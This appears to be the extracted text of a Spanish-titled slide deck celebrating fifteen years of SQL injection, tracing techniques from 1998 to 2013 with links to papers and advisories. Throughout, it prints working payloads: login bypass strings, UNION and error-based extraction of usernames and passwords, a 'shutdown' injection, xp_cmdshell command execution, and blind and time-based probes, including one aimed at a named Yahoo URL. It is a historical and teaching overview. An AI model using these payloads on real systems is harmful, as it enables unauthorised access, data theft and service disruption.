Feliz 15 aniversario, SQL Injection
Los Amantes del Círculo Polar
25 – Dec – 1998: El nacimiento
http://www.phrack.org/issues.html?id=8&issue=54
‘or ‘1’=‘1
q=“Select uid from users where uid=‘“+$user+”’ and pass=“’+pass+’”;”
admin
‘ or ‘1’=‘1
q=“Select uid from users where uid=‘admin’ and pass=‘’ or ‘1’=‘1’;”
14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
Inband
-1‘ union select 1,1,1,1,username,1,’a’,1 from users --
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
q=“Select title from noticias where ud=“+$id+”;”
Id=1 or 1=(select top 1 username from sysusers)
Jul – 2007: Microsoft Partner Programme
2002 – Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
Advanced Tricks
Id= 1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
27 – Mar - 2007
Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
2010 – US Army
2010 – US Army
2002 – Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
2004 – Time-Based in Other Databases
SQL Server1) ; if … wait for delay2) ; exec xp_cmdshell (ping –n)
Oracle1) dms_lock.sleep()
PL/SLQ Injection
MySQL1) and sleep()
5.0 or higher2) Benchmarck functions
Postgres:1) pg:sleep()
Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
Apr – 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
Time-Based Using Heavy Queries in MS Access
True
False
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
Serialized SQL Injection
Airthmetic Blind SQL Injection
RFD
Connection String Parameter Pollution
Xpath Injection
LDAP Injection
OWASP TOP 10 - 2013
Forbiden
Fixing Code Injections isn´t the worst job
Top Related